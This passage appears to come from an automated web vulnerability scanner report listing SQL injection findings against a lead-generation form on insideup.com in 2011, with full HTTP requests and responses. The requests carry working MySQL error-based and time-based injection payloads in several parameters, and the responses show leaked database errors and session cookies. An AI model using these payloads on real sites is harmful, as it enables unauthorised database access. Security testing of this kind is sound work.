Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:45:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name''&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:45:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.66. http://www.insideup.com/ppc/leadflow/bulo00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code&1'=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:56:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8358


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc' at line 5

1.67. http://www.insideup.com/ppc/leadflow/bulo00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code&1'=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:46:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10150


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
,0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code&1''=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:46:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9973


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.68. http://www.insideup.com/ppc/leadflow/bulo00/project.php [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The phone parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the phone parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:30:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=i' at line 5

1.69. http://www.insideup.com/ppc/leadflow/bulo00/project.php [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:45:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone''&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:45:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.70. http://www.insideup.com/ppc/leadflow/bulo00/project.php [subcategoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The subcategoryId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the subcategoryId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005'&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
